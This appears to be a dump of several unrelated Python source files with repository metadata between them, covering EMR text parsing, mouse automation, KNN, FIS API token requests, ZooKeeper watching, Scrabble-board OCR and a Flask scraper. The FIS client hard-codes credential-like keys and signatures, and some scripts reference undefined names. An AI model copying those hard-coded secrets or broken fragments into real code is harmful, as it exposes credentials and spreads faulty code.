    with open(emrtxt, 'r', errors="ignore") as f:
        lines = f.readlines()
    emrtxt = os.path.basename(emrtxt)
    emrtxt_str = re.findall(r'(^.+?)\_', emrtxt)  # patient ID = part before first '_'
    emrtxt = "".join(emrtxt_str)  # convert the single-element list to str
    out = []
    for line in lines:
        # NOTE(review): readlines() keeps the trailing '\n'; these equality
        # tests only match lines that are exactly the bare character —
        # confirm the input format.
        if line == '男':
            out.append(line)
        elif line == '女':  # fixed: original `elif line.'女'` was a SyntaxError
            out.append(line)
        if line.find('岁') > -1:  # age line, e.g. '45岁'
            line = re.sub('岁', '', line)  # strip the '岁' (years-old) suffix
            line = ''.join(line)  # fixed: was assigned to the typo name `lien`
            out.append(line)
            break  # age found — stop scanning this file
    output = ' '.join(out)
    EMRdef.text_create(r'D:\DeepLearning ER\EHRbase','.txt' ,emrtxt,output)
| [
"1044801968@qq.com"
] | 1044801968@qq.com |
57664c1e088570fae17e7586a13f77cbd55ccdca | 707409bcdc1dcc7c729696e8d0684c4bd05786c8 | /Sources/Gotcha/MouseControl.py | 49411175c8a5f10796d45b0d432e2d4e055c7d1c | [
"MIT"
] | permissive | KHUNerds/Gotcha | f1f58f1f42d4f2bf40516e6efbc231cb07917db9 | b0160da96d54cd48e5f9072d1acc4d491af0c577 | refs/heads/main | 2023-06-12T08:49:45.764110 | 2021-07-09T18:38:08 | 2021-07-09T18:38:08 | 384,382,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | import pyautogui
def MousePosition() -> tuple:
    # Annotation fixed from the incorrect `-> None`: this returns the current
    # cursor position (presumably a pyautogui Point namedtuple — TODO confirm).
    return pyautogui.position()
def MouseMove(x : int, y : int, t : int = 0) -> None:
    """Move the cursor to (x, y) over t seconds (t=0 moves immediately)."""
    print("moved mouse", x, y, "while", t, "seconds")
    pyautogui.moveTo(x, y, t)
def MouseClickLeft(count : int = 1) -> None:
    """Left-click `count` times at the current cursor position."""
    print("clicked mouse", count)
    pyautogui.click(clicks=count)
def MouseClickRight() -> None:
    """Right-click once at the current cursor position."""
    print("clicked mouse right")
    pyautogui.rightClick()
def MouseScroll(x : int) -> None:
    """Scroll the mouse wheel by x clicks (the sign selects the direction)."""
    print("scrolled while", x)
    pyautogui.scroll(x)
def MouseDrag(x : int, y : int, t : int = 0) -> None:
print("draged mouse", x, y, "while", t, "seconds")
pyautogui.dragTo(x, y, t) | [
"ssw03270@khu.ac.kr"
] | ssw03270@khu.ac.kr |
ea3aaa6e8b48540aa2d29098078de3207772a425 | 793ae2359153ad760fd9d096a477e239eaf1c517 | /KNearestNeighbors/kd_tree_knn.py | f415ccba11bbe16d85172dd90d1758cec4225ac6 | [] | no_license | kitkitkit745/MLTemplate | 6323640f11c48db0e369af355fceeef924cb96e0 | 129fa3b80167368523c87fe7ae93993e5c6ea8e0 | refs/heads/master | 2023-06-01T02:42:44.698095 | 2021-06-19T11:38:07 | 2021-06-19T11:38:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,495 | py | import numpy as np
from sklearn.neighbors import KDTree
class KDTreeKNN:
    def __init__(self, k):
        """K-nearest-neighbours classifier backed by sklearn's KDTree.

        Args:
            k: number of neighbours polled at prediction time.
        """
        self.k = k

    def fit(self, X, y):
        """Index the training samples in a KD-tree and keep their labels."""
        self.kdtree = KDTree(X)
        self.labels = y

    def predict(self, X):
        """Predict a label for each row of X by majority vote among the k
        nearest training samples.

        :param X: N x M array of query points (a 1-D array is treated as
            N samples of a single feature).
        :return: array of N predicted labels.
        """
        if len(X.shape) == 1:
            X = X.reshape(-1, 1)
        _, neighbour_idx = self.kdtree.query(X, self.k)
        votes = self.labels[neighbour_idx]
        # Majority vote per query point: most frequent label wins.
        predictions = np.asarray(
            [np.argmax(np.bincount(row)) for row in votes]
        )
        assert len(predictions) == len(X)
        return predictions
if __name__ == '__main__':
    # Demo: evaluate KDTreeKNN on sklearn's digits dataset with an 80/20 split.
    from sklearn import datasets
    data, labels = datasets.load_digits(return_X_y=True)
    # data = np.load('../data/mnist/mnist_data.npy')
    # labels = np.load('../data/mnist/mnist_labels.npy')
    n_sample = len(data)
    # Shuffle samples and labels with the same random permutation.
    shuffle = np.random.permutation(n_sample)
    data = data[shuffle]
    labels = labels[shuffle]
    split = int(n_sample * 0.8)
    train_data, test_data = data[:split], data[split:]
    train_labels, test_labels = labels[:split], labels[split:]
    # k=25 neighbours; no tuning performed here.
    model = KDTreeKNN(25)
    model.fit(train_data, train_labels)
    test_pred = model.predict(test_data)
    from utils.metric import accuracy
    print('ScratchKNN Acc: %.4g' % accuracy(test_labels, test_pred))
| [
"1370454515@qq.com"
] | 1370454515@qq.com |
40d8671c94da3a301dcd8dd73470c1af8be6c4dc | 4f2cdd9a34fce873ff5995436edf403b38fb2ea5 | /Data-Structures/List/Part2/P003.py | b6642ac9b5001105f692e511ac814eb924a9b9b2 | [] | no_license | sanjeevseera/Python-Practice | 001068e9cd144c52f403a026e26e9942b56848b0 | 5ad502c0117582d5e3abd434a169d23c22ef8419 | refs/heads/master | 2021-12-11T17:24:21.136652 | 2021-08-17T10:25:01 | 2021-08-17T10:25:01 | 153,397,297 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | """
Write a Python program to generate all permutations of a list in Python.
"""
import itertools
print(list(itertools.permutations([1,2,3]))) | [
"seerasanjeev@gmail.com"
] | seerasanjeev@gmail.com |
f1d4e78aa1876b8fbdb6f861d9de041b37b3fe01 | 53c1f83d6582e9fe36ba655470fbe5d7f96f459f | /Fis_Api/Fis_Ewire_Api/statics/staticfunctions.py | b59534a86976d0c07931ed97764512ae1b2b4911 | [] | no_license | aaronpaz123/pomona-R-D | 66303fabc456ea32a07fcaf058dbdc7dd36d69a0 | e2e4430b0eadec682b31a1b5ca1832ea7bad23ea | refs/heads/main | 2023-08-28T07:43:31.561616 | 2021-10-26T11:31:51 | 2021-10-26T11:31:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | import requests
import json
class CommonUtil:
    """Thin wrapper around ``requests`` with blanket error handling."""

    # Error handled post requests
    @staticmethod
    def postrequestManager(URL, headers, fwReqJson):
        """
        POST ``fwReqJson`` to ``URL`` and return the decoded JSON response.

        Never raises: on failure it returns an error description instead.
        NOTE the historical return-type inconsistency, preserved for
        callers: dict on success and on generic failure, a plain string for
        requests-level errors.
        """
        print("code is postrequestManager")
        try:
            print("postrequestManager PAYLOAD ==>"+ str(fwReqJson))
            print("postrequestManager HEADERS ==>"+ str(headers))
            print("postrequestManager HIT URL ==>"+ str(URL))
            r = requests.post(URL, headers=headers, data=fwReqJson)
            body = r.json()  # decode once instead of parsing twice
            print("AFTER HIT FIS ==>", body)
            return body
        except requests.exceptions.HTTPError as err:
            return str(err)
        except requests.Timeout as e:
            return "Request Timed Out"
        # Fixed: ConnectionError is a subclass of RequestException, so the
        # original ordering (RequestException first) made this branch
        # unreachable; it must be caught first.
        except requests.ConnectionError as e:
            return str(e)
        except requests.RequestException as e:
            return "Request Exception detected :"
        except Exception as e:
            return {"status":"error","message":str(e)}
class CommonResponse:
    """Builds the credential payload and Authorization headers for the FIS
    token endpoint.

    SECURITY NOTE: the key alias, institution id, signature and session key
    are hard-coded below; they should be moved to configuration or a
    secrets store.
    """
    # NOTE(review): class-level mutable dict shared by all instances that
    # bypass __init__ — confirm this sharing is intended.
    reqDict = dict()
    # This method provides the data necessary to generate a valid token
    def __init__(self,reqDict = None):
        # When a reqDict argument IS supplied it is ignored entirely and the
        # instance falls back to the (empty) class attribute — presumably a
        # bug; TODO confirm intended behaviour.
        if reqDict is None:
            self.reqDict = dict()
            self.reqDict["KEY_ALIAS"] = "0kbOdd5Zc0ccbd7090PtMA==.t7SEZXtjq1vF9JEYUbBXPg=="
            self.reqDict["INSTITUTION_ID"] = "0w5xC29wvYvRqQeYBPtajg==.tyayfH/qZw4hfuxAEYlnCA=="
            self.reqDict["APP_ID"] = ""
            self.reqDict["SIGNATURE"] = "0sjqRg8nkKdxreZam16RgfZavEwEhY62uldUQQn/AjS33appwao6cbM2VlaJfIckl2LZHlVoTdANDHaZ4bLuPwhuStrROljeDeiZzyLVvhN69oM/9typX2qWrcH4x6UsoIX+kfp51YvxcYR4AiVyP8rTbINbBX//JMkv7XeTp+6tDfs+Efws0k+YqWqVouwnAnUf6+7HTn096ZsjN9uBWu5QcdDtpKOG2A99itfqtQ/O4HuGVwyUJIYB29yUU/Gmub/2mHnBSVu49KqYigLHGR3MpVTVMjNxdZELKLjDikdXVwDBe7UZEmS/y/5RriEy68T2bgTsRz6t84QLE6Heew=="
            self.reqDict["SESSION_KEY"] = "mJpiCKZpCJG0dgS5EALL2HLKik+fOSW7MwtgytVQlmg="
    def get_auth_head(self,url,headers,status):
        """POST the hard-coded credentials to ``url`` and wrap the returned
        access token in request headers.

        status == 1 -> headers with Authorization and Content-Type;
        status == 2 -> Authorization only;
        anything else -> an error dict.
        """
        # Payload duplicates the credential constants from __init__.
        payload = dict()
        payload["KEY_ALIAS"] = "0kbOdd5Zc0ccbd7090PtMA==.t7SEZXtjq1vF9JEYUbBXPg=="
        payload["INSTITUTION_ID"] = "0w5xC29wvYvRqQeYBPtajg==.tyayfH/qZw4hfuxAEYlnCA=="
        payload["APP_ID"]=""
        payload["SIGNATURE"] = "0sjqRg8nkKdxreZam16RgfZavEwEhY62uldUQQn/AjS33appwao6cbM2VlaJfIckl2LZHlVoTdANDHaZ4bLuPwhuStrROljeDeiZzyLVvhN69oM/9typX2qWrcH4x6UsoIX+kfp51YvxcYR4AiVyP8rTbINbBX//JMkv7XeTp+6tDfs+Efws0k+YqWqVouwnAnUf6+7HTn096ZsjN9uBWu5QcdDtpKOG2A99itfqtQ/O4HuGVwyUJIYB29yUU/Gmub/2mHnBSVu49KqYigLHGR3MpVTVMjNxdZELKLjDikdXVwDBe7UZEmS/y/5RriEy68T2bgTsRz6t84QLE6Heew=="
        payload["SESSION_KEY"] = "mJpiCKZpCJG0dgS5EALL2HLKik+fOSW7MwtgytVQlmg="
        print("payload===get_auth_head====",payload)
        common_util = CommonUtil
        auth_head = common_util.postrequestManager(url,headers,payload)
        # auth_head = common_util.getRequestManager(url,headers,payload)
        if(status==1):
            auth_token = "Bearer " + auth_head["access_token"]
            # NOTE(review): "applicaton/json" is a typo in the live header
            # value — left untouched here because it is runtime behaviour.
            headers = {"Authorization":auth_token,"Content-Type": "applicaton/json"}
            print("headers staus 1 =====",headers)
            return headers
        elif status==2:
            auth_token = "Bearer " + auth_head["access_token"]
            headers = {"Authorization":auth_token}
            print("headers staus 2 =====",headers)
            return headers
        return {"Error":"invalid header status"}
| [
"84303172+chikkuthomas@users.noreply.github.com"
] | 84303172+chikkuthomas@users.noreply.github.com |
f1ef583aadd10cc24f2f4dbfad194f7a457bf95b | 977c5a562d3973965bfb0b4adf3cef35f9b9e135 | /Monitor.py | fa41f2206073984a580f635d296ef1287193d7e3 | [] | no_license | Adam0429/docker-try | 8939d103d1c6b6374847f57615fb67641d3d9add | 3ff80de8f57c482389babd1a3b1c4eedc07467db | refs/heads/master | 2021-04-18T22:09:56.813775 | 2018-06-11T02:51:21 | 2018-06-11T02:51:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | from kazoo.client import KazooClient
import time
import logging
logging.basicConfig()
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()
@zk.DataWatch('/path/to/watch')
def my_func(data, stat):
    """ZooKeeper watch callback: print the znode's data and version on change."""
    if data:
        print("Data is %s" % data)
        # Fixed: the original had a bare `print` name followed by a discarded
        # string expression, so the version was never actually printed.
        print("Version is %s" % stat.version)
    else:
        print("data is not available")
while True:
time.sleep(10)
zk.stop() | [
"872490934@qq.com"
] | 872490934@qq.com |
ff75406149e15011294ccb8e1cb60f0fc1fe9c12 | 7cd809a9410dc61238803aad6a73ed80bc15eeec | /Python/findboard.py | f7b5ffbb2def2674ff1e8db6b249e1130797cac0 | [
"MIT"
] | permissive | Oskrabble/ScrabbleOCR | ddbcb2d5b2f5641f6ee7a4ccb8e156f10b54dbb4 | 4470eca7dc476914ffaed71a6688c411fb958bdc | refs/heads/master | 2023-03-12T09:20:59.175752 | 2021-03-02T13:10:51 | 2021-03-02T13:10:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,997 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 26 15:20:14 2015
@author: elad
"""
from scipy.misc import imread
import numpy as np
import matplotlib.pyplot as plt
import cv2
from PIL import Image
import pytesseract
def four_point_transform(image, pts, dst=None):
    """
    Warp the quadrilateral ``pts`` in ``image`` to an axis-aligned rectangle
    (a top-down "birds eye view").

    Parameters:
        image: source image (array as used by OpenCV).
        pts: four corner points; ``order_points`` (defined elsewhere in this
            module) sorts them into top-left, top-right, bottom-right,
            bottom-left order.
        dst: optional (width, height) of the output; when omitted the size
            is derived from the quadrilateral's edge lengths.

    Returns the warped image.
    """
    # obtain a consistent order of the points and unpack them individually
    rect = order_points(pts)
    (tl, tr, br, bl) = rect
    # Fixed: `dst == None` is wrong here — for an array-like argument the
    # comparison is elementwise (ambiguous truth value); identity test is
    # the correct None check.
    if dst is None:
        # Output width: the longer of the two horizontal edges.
        widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
        widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
        maxWidth = max(int(widthA), int(widthB))
        # Output height: the longer of the two vertical edges.
        heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
        heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
        maxHeight = max(int(heightA), int(heightB))
    else:
        maxWidth, maxHeight = dst
    # Destination rectangle corners in top-left, top-right, bottom-right,
    # bottom-left order.
    dst = np.array([ [0, 0], [maxWidth - 1, 0],
                  [maxWidth - 1, maxHeight - 1],
                  [0, maxHeight - 1]], dtype = "float32")
    # compute the perspective transform matrix and then apply it
    M = cv2.getPerspectiveTransform(rect.astype("float32"), dst)
    warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
    return warped
if __name__ == "__main__":
#img_fn = r"C:\Users\elad\Documents\code\DigitalScrabble\board_OnePlus (1).jpg"
#img_fn = r"C:\Users\elad\Documents\code\DigitalScrabble\board_letters (3).jpg"
img_fn = r"C:\Users\elad\Desktop\IMG_BOARD.jpg"
#img_fn = r"C:\Users\elad\Documents\code\DigitalScrabble\board_nexus3 (3).jpg"
im_size = 8e6 #in total pixels. The size to set the image (larger will shrink and smaller will enlarge)
blur_size = (5,5)
blur_std = 5
open_close_kernel_size = (10, 10)
curve_approx_eps = 15 # maximum distance between the original curve and its approximation
warped_shape = (1024, 1024) # to which shape wrap the board
grid_size = (8,8) # x,y
border_shift = 55 #pixels. from outer border to inner
tile_std_th = 10 # STD of each tile Hue, to decide if it is occupied or not
letter_bw_th = 150 # threshold to seperate tile's letter from background
#%%
bgr = cv2.imread(img_fn)
# Bring all images to the same size
factor = np.round(np.sqrt(im_size/(bgr.shape[0]*bgr.shape[1])),2)
if factor < 1: interpolation = cv2.INTER_AREA #shrink
else: interpolation = cv2.INTER_LINEAR #enlarge
bgr = cv2.resize(bgr,None, fx=factor, fy=factor)
rgb = cv2.cvtColor(bgr.copy(), cv2.COLOR_BGR2RGB)
rgb = cv2.GaussianBlur(rgb, blur_size, blur_std)
rgbPyrDown = cv2.pyrDown(rgb)
rgbPyrDown = cv2.pyrDown(rgbPyrDown) # Downsample image by 4
r,g,b = rgbPyrDown[:,:,0],rgbPyrDown[:,:,1],rgbPyrDown[:,:,2]
hsv = cv2.cvtColor(rgbPyrDown.copy(), cv2.COLOR_RGB2HSV)
h,s,v = hsv[:,:,0],hsv[:,:,1],hsv[:,:,2]
#%% Thresholding
lower_red = (0, 50, 50)
upper_red = (9, 230, 235)
bw = cv2.inRange(hsv, lower_red, upper_red)
lower_red = (170, 50, 50)
upper_red = (180, 230, 235)
bw2 = cv2.inRange(hsv, lower_red, upper_red)
bw = np.uint8(np.logical_or(bw,bw2))
kernel = np.ones(open_close_kernel_size ,np.uint8)
bw = cv2.morphologyEx(bw, cv2.MORPH_OPEN, kernel) # opening (remove small objects from the foreground)
bw = cv2.morphologyEx(bw, cv2.MORPH_CLOSE, kernel) # closing (fill small holes in the foreground)
#%% Find Contour and 4 Corners
bwCanny = cv2.Canny(bw, 1, 1)
#%%
image, contours, hierarchy = cv2.findContours(bw.copy(), cv2.RETR_EXTERNAL ,cv2.CHAIN_APPROX_SIMPLE)
rgb_contours = rgb.copy()
rgb_contours_approx = rgb.copy()
rgb_warped = None
if contours != []:
for contour in contours:
if np.abs(cv2.contourArea(contour)) < 15000:
continue
#minRect = cv2.minAreaRect(contour)
#rectPoints = cv2.boxPoints(minRect).astype(np.int32)
# TODO - check distance from center
contour = contour*4 # Upsample back to original image size
points = contour.reshape((-1,2))
topLeft_ind = np.argmin(points[:,0] + points[:,1])
bottomRight_ind = np.argmin(- points[:,0] - points[:,1])
topRight_ind = np.argmin(- points[:,0] + points[:,1])
bottomLeft_ind = np.argmin(points[:,0] - points[:,1])
corners = np.vstack((points[topLeft_ind,:],
points[topRight_ind,:],
points[bottomRight_ind,:],
points[bottomLeft_ind,:]))
rgb_contours_approx = rgb.copy()
cv2.drawContours(rgb_contours, contour, 0, (255,255,0), 5)
#cv2.drawContours(rgb_contours_approx, rectPoints.reshape((4,-1,2)), 0, (255,255,0), 5)
colors = ((255,0,0), (0,255,0), (0,0,255), (255,255,255))
for n in range(4):
cv2.circle(rgb_contours_approx, tuple(corners[n,:].tolist()), 35, colors[n],-1)
# Apply the perspective transformation
rgb_warped = four_point_transform(rgb.copy(), corners, warped_shape)
#%% find accurate corners of warped board
TEMPLATE_SIZE = 32
template = np.zeros((TEMPLATE_SIZE,TEMPLATE_SIZE,3), dtype=np.uint8)
template[0:TEMPLATE_SIZE/2-2, :, :] = (255, 0, 0) #red
template[:, 0:TEMPLATE_SIZE/2-2, :] = (255, 0, 0)
template[TEMPLATE_SIZE/2+2:, TEMPLATE_SIZE/2+2:, :] = (189, 215, 238) #light blue
roi_img_size_x = rgb_warped.shape[1] / 8
roi_img_size_y = rgb_warped.shape[0] / 8
corr_result = cv2.matchTemplate(rgb_warped[0:roi_img_size_y, 0:roi_img_size_x],
template, cv2.TM_CCOEFF_NORMED)
vmin, vmax, minLoc, maxLoc = cv2.minMaxLoc(corr_result)
topLeft = (maxLoc[0] + TEMPLATE_SIZE /2, maxLoc[1] + TEMPLATE_SIZE /2)
template = cv2.flip(template, -1)
roi_col = rgb_warped.shape[1] - roi_img_size_x
roi_row = rgb_warped.shape[0] - roi_img_size_y
corr_result = cv2.matchTemplate(rgb_warped[roi_col:, roi_row:], template, cv2.TM_CCOEFF_NORMED)
vmin, vmax, minLoc, maxLoc = cv2.minMaxLoc(corr_result)
bottomRight = (roi_col + maxLoc[0] + TEMPLATE_SIZE /2, roi_row + maxLoc[1] + TEMPLATE_SIZE /2)
# find two other corners by calculation
xc = (topLeft[0] + bottomRight[0])/2
yc = (topLeft[1] + bottomRight[1])/2 # Center point
xd = (topLeft[0] - bottomRight[0])/2
yd = (topLeft[1] - bottomRight[1])/2 # Half-diagonal
topRight = (xc - yd, yc + xd)
bottomLeft = (xc + yd, yc - xd)
corners = np.array([topLeft, topRight, bottomRight, bottomLeft])
#%% Build Tiles grid
rgb_warped_plot = rgb_warped.copy()
vr_x = (corners[1,0] - corners[0,0]) / grid_size[0]; # one unit of vector right
vr_y = (corners[1,1] - corners[0,1]) / grid_size[1]; # one unit of vector right
vd_x = (corners[3,0] - corners[0,0]) / grid_size[0]; # one unit of vector down
vd_y = (corners[3,1] - corners[0,1]) / grid_size[1]; # one unit of vector down
tiles = []
for row in range(grid_size[1]):
for col in range(grid_size[0]):
p1 = np.array([corners[0,0] + col*vr_x + row*vd_x,
corners[0,1] + col*vr_y + row*vd_y])
p2 = np.array([corners[0,0] + (col+1)*vr_x + (row+1)*vd_x,
corners[0,1] + (col+1)*vr_y + (row+1)*vd_y])
tiles.append({'row':row, 'col': col, 'p1':p1, 'p2': p2 })
for tile in tiles:
cv2.rectangle(rgb_warped_plot, tuple(tile['p1'].tolist()),tuple(tile['p2'].tolist()), (0,255,255), 5)
#%% Check if grid occupied
hsv2 = cv2.cvtColor(rgb_warped.copy(), cv2.COLOR_RGB2HSV)
h2,s2,v2 = hsv2[:,:,0],hsv2[:,:,1],hsv2[:,:,2]
occupied_tiles = []
for i in range(grid_size[1]):
for j in range(grid_size[0]):
x,y = grid[i,j,:]
tile_roi = h2[y-tile_height/2+20:y+tile_height/2-20,
x-tile_width/2+20:x+tile_width/2-20]
tile_std = np.std(tile_roi)
#print("i=%d, j=%d, std=%.2f" % (i,j,tile_std))
if tile_std > tile_std_th:
occupied_tiles.append((i,j))
cv2.circle(rgb_warped_plot, tuple(grid[i,j,:].tolist()), 30, (255,255,0),-1)
#%% Build Lettes Dict
rgb_letters_plots = rgb_warped.copy()
letters = []
for tile_ij in occupied_tiles:
letter = {}
i,j = tile_ij
x,y = grid[i,j,:]
tile_roi = v2[y-tile_height/2+25:y+tile_height/2-25,
x-tile_width/2+25:x+tile_width/2-25]
tile_bw = tile_roi > letter_bw_th
pil_img = Image.fromarray(np.uint8(tile_bw))
tile_ocr = pytesseract.image_to_string(pil_img, config="-psm 10")
letter['i'], letter['j'] = i,j
letter['bw'] = tile_bw
letter['ocr'] = tile_ocr
letters.append(letter)
print("i=%d, j=%d, OCR=%s" % (i,j, tile_ocr))
cv2.putText(rgb_letters_plots, "%s" % tile_ocr, tuple((grid[i,j,:]-4).tolist()),
cv2.FONT_HERSHEY_SIMPLEX, 2.5, (255,255,255), 3 ,2)
cv2.putText(rgb_letters_plots, "%s" % tile_ocr, tuple(grid[i,j,:].tolist()),
cv2.FONT_HERSHEY_SIMPLEX, 2.5, (0,0,0), 3 ,2)
#
#minLineLength = 100
#maxLineGap = 1
#lines = cv2.HoughLinesP(bw.copy(), 1, np.pi/180, 100, minLineLength, maxLineGap)
#rgb_hough_lines = rgb.copy()
#for x1,y1,x2,y2 in lines[:,0,:]:
# cv2.line(rgb_hough_lines,(x1,y1),(x2,y2),(0,255,0),2)
#%% Plot
# Plot RGB and HSV
fig = plt.figure()
ax1 = fig.add_subplot(2,3,1)
ax1.imshow(r, cmap='gray')
ax1.set_title("Red")
ax1.format_coord = lambda x,y: "x=%.1f, y=%.1f, Red=%1.f" % (x, y, r[int(y),int(x)])
ax2 = fig.add_subplot(2,3,2)
ax2.imshow(g, cmap='gray')
ax2.set_title("Green")
ax2.format_coord = lambda x,y: "x=%.1f, y=%.1f, Green=%1.f" % (x, y, g[int(y),int(x)])
ax3 = fig.add_subplot(2,3,3)
ax3.imshow(b, cmap='gray')
ax3.set_title("Blue")
ax3.format_coord = lambda x,y: "x=%.1f, y=%.1f, Blue=%1.f" % (x, y, b[int(y),int(x)])
ax4 = fig.add_subplot(2,3,4)
ax4.imshow(h, cmap='gray')
ax4.set_title("Hue")
ax4.format_coord = lambda x,y: "x=%.1f, y=%.1f, Hue=%1.f" % (x, y, h[int(y),int(x)])
ax5 = fig.add_subplot(2,3,5)
ax5.imshow(s, cmap='gray')
ax5.set_title("Saturation")
ax5.format_coord = lambda x,y: "x=%.1f, y=%.1f, Saturation=%1.f" % (x, y, s[int(y),int(x)])
ax6 = fig.add_subplot(2,3,6)
ax6.imshow(v, cmap='gray')
ax6.set_title("Value")
ax6.format_coord = lambda x,y: "x=%.1f, y=%.1f, Value=%1.f" % (x, y, v[int(y),int(x)])
# Plot Threshold
fig2 = plt.figure()
ax1_2 = fig2.add_subplot(2,2,1)
ax1_2.imshow(rgb)
ax1_2.set_title("RGB")
ax2_2 = fig2.add_subplot(2,2,2)
ax2_2.imshow(bw, cmap='gray')
ax2_2.set_title("BW")
ax3_2 = fig2.add_subplot(2,2,3)
ax3_2.imshow(rgb_contours_approx)
ax3_2.set_title("4 Corners detction")
ax4_2 = fig2.add_subplot(2,2,4)
ax4_2.imshow(rgb_warped)
ax4_2.set_title("RGB Warped")
# Plot Grid
fig3 = plt.figure()
ax1_3 = fig3.add_subplot(2,2,1)
ax1_3.imshow(rgb_warped_plot)
ax1_3.set_title("Grid Detection")
ax2_3 = fig3.add_subplot(2,2,2)
ax2_3.imshow(rgb_letters_plots)
ax2_3.set_title("Letters OCR")
"""
HSV color space is also consists of 3 matrices, HUE, SATURATION and VALUE.
In OpenCV, value range for HUE, SATURATION and VALUE are
respectively 0-179, 0-255 and 0-255.
HUE represents the color, SATURATION represents the amount to which that
respective color is mixed with white and VALUE represents the amount to
which that respective color is mixed with black.
red object has HUE, SATURATION and VALUE in between 170-180, 160-255, 60-255
Hue values of basic colors
Orange 0-22
Yellow 22- 38
Green 38-75
Blue 75-130
Violet 130-160
Red 160-179
""" | [
"eladjoseph@hotmail.com"
] | eladjoseph@hotmail.com |
45242f33898eb7f9f32d81e88104ff79dccc109a | f9fe13fe62ba3fb1fb096da4268d5dc43e435ea4 | /44)in_range_or_not.py | 7b43b95dede8dbe7f422e93fd0c9f353fc060d58 | [] | no_license | MANNEMPRATAPVARUN/guvipy | 7e460da8b9d98c2fcd488757585d5bd207570666 | 4da4fe4f3d4855e14383015da19588ef0aea4f32 | refs/heads/master | 2020-06-10T01:22:26.063815 | 2019-06-12T13:44:44 | 2019-06-12T13:44:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 81 | py | num2=int(input())
if num2 in range(1,10):
    # NOTE(review): range(1,10) covers 1..9 only — 10 itself prints "no";
    # confirm whether the upper bound was meant to be inclusive.
    print("yes")
else:
    print("no")
| [
"noreply@github.com"
] | noreply@github.com |
508db52a1ce4ee8d59763669cf083035e3b0ebe6 | ee6e6b1d4d00aa4d45ea430488d984e976585f61 | /app.py | 86d738dcfe62ddeea6b58c738b545eaf3bbfc9a7 | [] | no_license | MINHAS3/Mission-to-Mars | b726766f4d851d1faa20f20b2a7b052eab09476d | 3b2001006d1cd923cafebfeeae3ff1a4ed32f72c | refs/heads/master | 2023-01-11T00:45:13.281690 | 2020-11-05T18:54:31 | 2020-11-05T18:54:31 | 286,098,935 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | from flask import Flask, render_template
from flask_pymongo import PyMongo
import scraping
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
def index():
    # Homepage: render the single scraped-Mars document stored in Mongo.
    mars = mongo.db.mars.find_one()
    return render_template("index.html", mars=mars)
@app.route("/scrape")
def scrape():
    # Re-scrape all Mars data and upsert it into the one-document collection.
    mars = mongo.db.mars
    mars_data = scraping.scrape_all()
    # NOTE(review): Collection.update() is deprecated in modern PyMongo;
    # update_one({}, {"$set": ...}, upsert=True) is the replacement.
    mars.update({}, mars_data, upsert=True)
    return "Scraping Successful!"
if __name__ == "__main__":
app.run()
| [
"noreply@github.com"
] | noreply@github.com |
05a556ef861672edfb343d7c6bee8f42af414fb8 | 0959d88eb8e1ab579dec7eb4bfc1fbaac945ea0b | /Training/HackRank/Day/d1.py | 594bf8c900683d4262274389d4fb02313fc23838 | [] | no_license | mike03052000/python | ba1b871acf853710fd840284f260d82ea8e597cf | 19045d56ae1caa305f51f1cad6c71d97b82ca47d | refs/heads/master | 2020-04-04T12:21:55.284225 | 2019-06-20T05:35:25 | 2019-06-20T05:35:25 | 155,923,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | i=4
d=4.0
s = 'Hacker Rank'
# NOTE(review): the exercise solution is pasted twice below, so this script
# reads SIX lines from stdin (int, float, str — twice); confirm that the
# duplication is intentional.
# Declare second integer, double, and String variables.
i2=0
d2=0.0
s2=''
# Read and save an integer, double, and String to your variables.
i2=int(input().strip())
d2=float(input().strip())
s2=input().strip()
# Print the sum of both integer variables on a new line.
print(i+i2)
# Print the sum of the double variables on a new line.
print(d+d2)
# Concatenate and print the String variables on a new line
# The 's' variable above should be printed first.
print(s+s2)
# Declare second integer, double, and String variables.
a = 0
b = 0.0
c = ""
# Read and save an integer, double, and String to your variables.
a = int(input())
b = float(input())
c = str(input())
# Print the sum of both integer variables on a new line.
print(i+a)
# Print the sum of the double variables on a new line.
print(d+b)
# Concatenate and print the String variables on a new line
# The 's' variable above should be printed first.
print(s,c)
| [
"saka16888@gmail.com"
] | saka16888@gmail.com |
5d6e694a8990fb46429ed901d0093ca8ac480f52 | e63dbac6d1dbe1cb8a68ac911c562d9fa9192a59 | /odvm/renderer.py | 37f8f76a5fe9b80244424dbac68738b8b16aec6d | [
"MIT"
] | permissive | hi9hlander/odvm | e5ae9fab9c3f45b2f9eb6a253db4c66fd0efa19b | 90df59ac584690a70658477ccf109c143c250d9d | refs/heads/master | 2022-01-21T02:37:58.704535 | 2017-09-25T18:59:19 | 2017-09-25T18:59:19 | 99,145,092 | 3 | 3 | MIT | 2022-01-17T00:24:26 | 2017-08-02T17:44:19 | Python | UTF-8 | Python | false | false | 6,491 | py | from panda3d.core import *
from direct.showbase.ShowBase import ShowBase
from math import tan, radians
def glsl_check_for_use(glsl, feature):
    """Return True if *feature* occurs in *glsl* once all whitespace is
    removed from both strings (i.e. a whitespace-insensitive substring test).
    """
    needle = ''.join(feature.split())
    haystack = ''.join(glsl.split())
    return needle in haystack
class viewport:
    """Offscreen render target that mirrors the host window.

    Owns a GraphicsOutput with depth/stencil, color and (optionally) one aux
    HRGBA texture, re-targets the default camera at it, and keeps a
    'viewport' shader input in sync with window size / camera FOV for every
    registered consumer.
    """

